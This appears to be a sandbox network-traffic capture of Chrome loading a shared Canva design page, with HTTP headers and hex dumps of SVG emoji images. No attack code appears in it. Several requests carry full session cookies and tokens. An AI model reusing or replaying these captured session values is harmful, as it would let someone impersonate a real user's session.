                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4d 67 6e 46 74 74 64 6b 75 49 56 4e 67 78 76 62 37 38 79 34 43 71 68 72 25 32 46 25 32 46 35 77 36 6c 63 7a 4b 33 67 50 4a 76 42 50 4e 51 75 72 73 72 4c 58 7a 4d 74 47 69 34 50 39 39 70 56 38 56 53 4a 6e 61 62 4a 44 62 70 6d 34 4d 25 32 42 59 67 31 7a 30 51 4e 55 61 33 72 41 67 6e 54 58 4f 56 25 32 42 59 77 46 62 45 4e 32 71 52 4c 43 76 41 47 6b 48 4a 54 36 65 66 6b 73 52 39 6e 70 64 73 47 42 6d 35 75 73 52 54 38 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgnFttdkuIVNgxvb78y4Cqhr%2F%2F5w6lczK3gPJvBPNQursrLXzMtGi4P99pV8VSJnabJDbpm4M%2BYg1z0QNUa3rAgnTXOV%2BYwFbEN2qRLCvAGkHJT6efksR9npdsGBm5usRT8%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1198INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 44 42 35 45 22 20 64 3d 22 4d 33 34 2e 39 35 36 20 31 37 2e 39 31 36 63 30 2d 2e 35 30 33 2d 2e 31 32 2d 2e 39 37 35 2d 2e 33 32 31 2d 31 2e 34 30 34 2d 31 2e 33 34 31 2d 34 2e 33 32 36 2d 37 2e 36 31 39 2d 34 2e 30 31 2d 31 36 2e 35 34 39 2d 34 2e 32 32 31 2d 31 2e 34 39 33 2d 2e 30 33 35 2d 2e 36 33 39 2d 31 2e 37 39 38 2d 2e 31 31 35 2d 35 2e 36 36 38 2e 33 34 31 2d 32 2e 35 31 37 2d 31 2e 32 38 32 2d 36 2e 33 38 32 2d 34 2e 30 31 2d 36 2e 33 38 32 2d 34 2e 34 39 38 20 30 2d 2e 31 37 31 20 33 2e 35 34 38 2d 34 2e 31 34 38 20 31 32
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFDB5E" d="M34.956 17.916c0-.503-.12-.975-.321-1.404-1.341-4.326-7.619-4.01-16.549-4.221-1.493-.035-.639-1.798-.115-5.668.341-2.517-1.282-6.382-4.01-6.382-4.498 0-.171 3.548-4.148 12
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC206INData Raw: 30 20 31 20 30 2d 31 2e 35 30 34 2d 2e 38 39 34 20 31 2e 35 37 32 20 31 2e 35 37 32 20 30 20 30 20 31 2d 31 2e 33 36 33 2e 37 37 37 68 2d 37 2e 30 36 33 61 31 2e 35 38 35 20 31 2e 35 38 35 20 30 20 30 20 31 20 30 2d 33 2e 31 36 37 68 38 2e 30 39 31 61 33 2e 33 35 20 33 2e 33 35 20 30 20 30 20 30 20 32 2e 38 36 37 2d 31 2e 36 33 32 2e 38 37 35 2e 38 37 35 20 30 20 30 20 30 2d 31 2e 35 30 34 2d 2e 38 39 34 20 31 2e 35 37 33 20 31 2e 35 37 33 20 30 20 30 20 31 2d 31 2e 33 36 33 2e 37 37 36 48 32 33 2e 30 32 61 31 2e 35 38 35 20 31 2e 35 38 35 20 30 20 30 20 31 20 30 2d 33 2e 31 36 37 7a 22 2f 3e 3c 2f 73 76 67 3e
                                                                                                                                                                                                                                                                    Data Ascii: 0 1 0-1.504-.894 1.572 1.572 0 0 1-1.363.777h-7.063a1.585 1.585 0 0 1 0-3.167h8.091a3.35 3.35 0 0 0 2.867-1.632.875.875 0 0 0-1.504-.894 1.573 1.573 0 0 1-1.363.776H23.02a1.585 1.585 0 0 1 0-3.167z"/></svg>


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    95192.168.2.1249827104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC2282OUTGET /_ajax/csrf3/ae HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-App: design_viewer
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    X-Canva-Build-Sha: 4aaacc3
                                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-Analytics: AAMAA1dFQgA=
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241118-21
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1087INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e1f578c75-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e59513e1f578c75
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xl3FQdKkgLYL1Kmd%2FPaXVydclrtwPlC9g8aoM%2B%2BDx%2B5cEKX84NugxN8iN3OaDXorkRlKq%2FUk9XfW9%2F7xxQLh%2FwyJuKREHkXZphwtz%2FW3SoW1Cwl82FD3qbifwdnLncA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC143INData Raw: 38 39 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 22 6d 36 35 75 75 69 4d 34 68 4f 48 70 6f 30 36 64 67 53 50 68 52 71 50 45 68 64 43 52 4b 69 75 76 51 4f 61 73 4c 66 76 48 45 37 44 50 35 6b 54 55 72 42 4d 34 6b 66 5f 61 49 31 55 6f 66 4f 55 67 6b 65 72 6b 43 5f 4c 66 78 4e 46 36 67 4f 65 52 4c 71 74 4d 6f 70 64 62 61 2d 30 22 2c 22 42 22 3a 31 37 33 32 31 32 32 31 30 37 39 38 33 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 89'"])}while(1);</x>//{"A":"m65uuiM4hOHpo06dgSPhRqPEhdCRKiuvQOasLfvHE7DP5kTUrBM4kf_aI1UofOUgkerkC_LfxNF6gOeRLqtMopdba-0","B":1732122107983}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    96192.168.2.1249820104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC639OUTGET /web/images/3e78ef31f2928a74c6d7ba19b91d0570.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 1865
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e1f890f5b-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1621551
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "3e78ef31f2928a74c6d7ba19b91d0570"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 15 Oct 2024 03:57:54 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 16 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: jw7rzs5uVXRdC9j1wF3CfqtLfKB1gp1T80PFc3MaQ5Sq1tqj7LNve3ratOiL7bKStj/+/CZ8+ZQ=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 2HE990H9A0621KZA
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: Xikq.2KyZ83h9C3fWv5yHatCFZS0el.H
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 39 76 78 34 67 37 66 4a 69 4a 25 32 42 4a 51 58 50 56 77 64 46 49 74 38 56 6a 66 7a 36 61 59 5a 48 74 4e 30 59 38 59 6c 79 34 4a 34 61 48 56 4b 49 49 42 4d 32 57 49 66 5a 52 44 75 4a 37 47 53 25 32 42 43 55 4f 56 35 76 6e 66 75 4a 4e 25 32 42 63 25 32 42 25 32 42 65 6f 65 52 6d 6f 32 6f 30 57 56 4a 31 63 4d 68 33 73 75 6a 4f 78 62 4f 76 6a 77 25 32 42 38 44 39 74 51 71 46 43 73 55 69 69 70 34 33 77 74 69 49 46 41 4f 46 68 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vx4g7fJiJ%2BJQXPVwdFIt8Vjfz6aYZHtN0Y8Yly4J4aHVKIIBM2WIfZRDuJ7GS%2BCUOV5vnfuJN%2Bc%2B%2BeoeRmo2o0WVJ1cMh3sujOxbOvjw%2B8D9tQqFCsUiip43wtiIFAOFhg%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1193INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 33 33 22 20 68 65 69 67 68 74 3d 22 33 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 33 20 33 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 33 32 2e 32 39 20 31 36 63 30 20 38 2e 38 33 37 2d 37 2e 31 36 34 20 31 36 2d 31 36 20 31 36 2d 38 2e 38 33 37 20 30 2d 31 36 2d 37 2e 31 36 33 2d 31 36 2d 31 36 20 30 2d 38 2e 38 33 36 20 37 2e 31 36 33 2d 31 36 20 31 36 2d 31 36 20 38 2e 38 33 36 20 30 20 31 36 20 37 2e 31 36 34 20 31 36 20 31 36 5a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 5f 33 39 30 30 36 36 33 33 39 34 5f 5f 61 29 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 36 2e 31 33 31 20 31
                                                                                                                                                                                                                                                                    Data Ascii: <svg width="33" height="32" viewBox="0 0 33 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32.29 16c0 8.837-7.164 16-16 16-8.837 0-16-7.163-16-16 0-8.836 7.163-16 16-16 8.836 0 16 7.164 16 16Z" fill="url(#_3900663394__a)"/><path d="M26.131 1
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC672INData Raw: 5a 22 20 66 69 6c 6c 3d 22 23 36 36 34 35 30 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 37 2e 38 31 38 20 32 30 2e 37 30 36 73 32 2e 38 32 34 2e 39 34 20 38 2e 34 37 2e 39 34 63 35 2e 36 34 38 20 30 20 38 2e 34 37 31 2d 2e 39 34 20 38 2e 34 37 31 2d 2e 39 34 73 2d 31 2e 38 38 32 20 33 2e 37 36 35 2d 38 2e 34 37 20 33 2e 37 36 35 63 2d 36 2e 35 38 38 20 30 2d 38 2e 34 37 2d 33 2e 37 36 35 2d 38 2e 34 37 2d 33 2e 37 36 35 5a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 2e 35 35 37 20 32 35 2e 36 32 38 61 34 2e 37 30 35 20 34 2e 37 30 35 20 30 20 30 20 31 2d 35 2e 37 32 20 33 2e 34 30 32 20 34 2e 37 30 34 20 34 2e 37 30 34 20 30 20 30 20 31 2d 33 2e 34 30 32 2d 35 2e 37 31 38 63 2e 36 34 2d 32 2e 35 32 20 35 2e 39 36 34 2d 38
                                                                                                                                                                                                                                                                    Data Ascii: Z" fill="#664500"/><path d="M7.818 20.706s2.824.94 8.47.94c5.648 0 8.471-.94 8.471-.94s-1.882 3.765-8.47 3.765c-6.588 0-8.47-3.765-8.47-3.765Z" fill="#fff"/><path d="M9.557 25.628a4.705 4.705 0 0 1-5.72 3.402 4.704 4.704 0 0 1-3.402-5.718c.64-2.52 5.964-8


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    97192.168.2.1249821104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC639OUTGET /web/images/3a05dbf1cdd156fcd1677a0b444cc36f.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 842
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e3eba432b-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1241653
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "3a05dbf1cdd156fcd1677a0b444cc36f"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 27 Aug 2024 02:38:14 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 28 Aug 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: cPTnkETf4NTfyuVOC4Nfde6rgtEAxTV9HnuOPUZyi2DX5a6HJ4osQVcwxEU0Wu4Fza7vjGhi2z4=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: B554DY9FRAY99385
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: Nf.edrUDuskUuIL9M0gq31Qlj_5bEaFT
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 75 63 4e 34 65 54 25 32 46 54 49 25 32 42 72 39 78 33 59 76 68 35 75 30 68 32 5a 33 37 53 35 4a 78 6f 4a 36 57 50 38 78 57 44 6a 4a 74 4d 75 5a 46 41 62 77 57 65 25 32 46 42 6e 71 71 4a 63 58 46 77 6a 72 33 51 46 75 33 25 32 42 4f 44 6b 55 6d 71 64 71 65 6c 25 32 46 30 45 6e 35 4b 37 67 62 7a 33 74 53 31 67 37 55 31 72 41 52 6d 50 62 72 6c 50 5a 44 73 31 56 76 76 25 32 46 4b 77 6a 37 74 36 70 7a 45 71 68 43 35 7a 4c 53 31 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ucN4eT%2FTI%2Br9x3Yvh5u0h2Z37S5JxoJ6WP8xWDjJtMuZFAbwWe%2FBnqqJcXFwjr3QFu3%2BODkUmqdqel%2F0En5K7gbz3tS1g7U1rARmPbrlPZDs1Vvv%2FKwj7t6pzEqhC5zLS1o%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC842INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 33 32 22 20 68 65 69 67 68 74 3d 22 33 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 33 32 20 31 36 63 30 20 38 2e 38 33 37 2d 37 2e 31 36 33 20 31 36 2d 31 36 20 31 36 53 30 20 32 34 2e 38 33 37 20 30 20 31 36 20 37 2e 31 36 33 20 30 20 31 36 20 30 73 31 36 20 37 2e 31 36 33 20 31 36 20 31 36 5a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 5f 31 35 36 32 34 30 39 33 36 35 5f 5f 61 29 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 32 33 35 20 31 32 2e 32 33 35 63 30 20 31 2e 35 36 2d 2e 39 30 33 20 32 2e 38 32 34 2d 32 2e 30 31 37 20
                                                                                                                                                                                                                                                                    Data Ascii: <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32 16c0 8.837-7.163 16-16 16S0 24.837 0 16 7.163 0 16 0s16 7.163 16 16Z" fill="url(#_1562409365__a)"/><path d="M12.235 12.235c0 1.56-.903 2.824-2.017


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    98192.168.2.1249822104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC639OUTGET /web/images/0483f2b648dcc986d01385062052ae1c.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 368
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e1cae42c6-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
